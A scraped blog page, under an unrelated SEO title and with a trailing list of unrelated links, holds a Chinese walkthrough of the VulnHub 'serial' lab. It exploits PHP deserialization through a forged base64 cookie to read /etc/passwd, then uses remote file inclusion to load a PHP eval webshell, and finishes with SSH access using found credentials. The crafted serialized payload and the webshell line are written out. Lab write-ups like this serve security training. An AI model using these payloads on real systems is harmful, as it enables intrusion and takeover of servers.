当前位置: 首页 > news >正文

做招聘网站排名wordpress获取页面文章内容的代码

做招聘网站排名,wordpress获取页面文章内容的代码,做视频网站多大空间够,软件开发流程示意图环境搭建 下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。 这里就是使用我们刚才下过来的。 漏洞过程详解 1.信息收集 打开靶机&#xff0…

环境搭建

下载

https://download.vulnhub.com/serial/serial.zip

解压出来就是这种

 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。

这里就是使用我们刚才下过来的。 

 漏洞过程详解
1.信息收集

打开靶机,在kali虚拟机中进行主机存活探测

arp-scan -l

分析一下,可知靶机IP地址位192.168.3.131

2.端口扫描 

nmap -p- 192.168.3.131 --min-rate=10000(以最小速率10000扫描)

3.目录扫描

可以都访问一下

 在backup目录下发现bak.zip文件,下载下来

4.漏洞扫描

分析文件
index.php

发现三个文件有包含的关系,放到同一文件中分析

<?phpclass Log {private $type_log;function __costruct($hnd) {$this->$type_log = $hnd;}public function handler($val) {include($this->type_log);echo "LOG: " . $val;}}class Welcome {public function handler($val) {echo "Hello " . $val;}}class User {private $name;private $wel;function __construct($name) {$this->name = $name;$this->wel = new Welcome();}function __destruct() {//echo "bye\n";$this->wel->handler($this->name);}}if(!isset($_COOKIE['user'])) {setcookie("user", base64_encode(serialize(new User('sk4'))));} else {unserialize(base64_decode($_COOKIE['user']));}echo "This is a beta test for new cookie handler\n";
?>

发现有三个类,如果用户没有COOKIE,就给用户生成一个名为sk4的COOKIE,否则将用户的COOKIE反序列化;
COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果;
User类中有两个魔法方法,分别为创建和销毁时调用
我们代理抓包,进入repeater模块 

尝试将COOKIE删除,相应包中带来了COOKIE,用户名为sk4

将COOKIE撤销回去

5.尝试更改 COOKIE

选中COOKIE,在burp的解码器中可以看出这里的cookie经过了URL编码,将%3D改成=

 

再次选中COOKIE,将解码方式改为Base64,可以看出结果为User类的序列化结果 

进行Base64解码,修改用户名及其长度

O:4:"User":2:{s:10:"Username";s:5:"mzqms";s:9:"Userwel";O:7:"Welcome":0:{}}7

 

漏洞利用
漏洞存在,思考利用

继续分析代码,发现Wel实例销毁时调用了公共方法hadler,而hadler方法不止在Welcome类中有,在Log类中不仅存在hadler方法,还存在文件包含,所以替换COOKIE中的Welocome实例
由于目标系统为Linux,所以文件包含passwd

这里可以直接用我下面的

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

 发现passwd文件显示了出来

尝试远程文件包含

开启Windows系统的服务器,根目录下创建一个1.txt文件

更改COOKIE,要改成自己的window的ip

将1.txt改为一句话木马

<?php
@eval($_POST['cmd']);
?>
 打开蚁剑连接将Cookie放入Http头中

 测试连接连接成功

浏览目录,发现根目录下有credentials.txt.bak文件

应该是sk4用户的密码,由于22端口开启,尝试远程连接
ssh sk4@192.168.3.131

登陆成功,依旧浏览目录,发现flag
 

http://www.yayakq.cn/news/445945/

相关文章:

  • 做网站需要的图片seo 能提高网站速度吗
  • 怎么用虚拟主机做网站步骤logo在线设计生成器标智客
  • 网站初期建设方案策划网站建设
  • 在线做图表网站深圳设计公司招聘信息
  • 网站内容管理系统建设wordpress自动图片保存本地
  • 网站指数查询如何制作网站的横幅
  • 在线绘画网站近期新闻大事
  • 全景网站开发多少钱浙江网站建设制作
  • 三点水网站建设合同网站开发费计入什么科目合适
  • 为学校建设网站dw做网站后台
  • 公司网站建设设计服务吉林省建设项目招标网站
  • 中企动力中山分公司网站网站推广优化开发建设
  • 网站建设能赚多少钱电影新网站如何做seo优化
  • 陕西省建设工程安全协会网站php论坛网站建设教程
  • 网站后台添加文字网站建设中山优化
  • 长春市长春网站建设哪家好网站制作厦门公司
  • 网站跟wordpress连接网页设计试题及答案
  • 网站开发结构有中国外贸导航网
  • 榆林建设银行的网站买什么样的主机(用来建网站的)支持下载
  • 万网网站建设特点通辽北京网站建设
  • 网站建设外包协议做的最好自考网站是哪个
  • 做印刷网站公司简介crm系统怎么用
  • 建一个网站多少钱免费网站流量统计工具
  • 硬笔书法网站是谁做的一站式营销推广平台
  • 网站的建设与应用广州越秀建网站
  • dedecms如何做网站毕业设计做课程网站好
  • 网站的经营推广自助网站建设用什么好
  • 医疗网站平台建设方案国外网站 备案
  • 产品展示类网站晋江外贸网站建设
  • 科技公司 网站 石家庄网站备案进程查询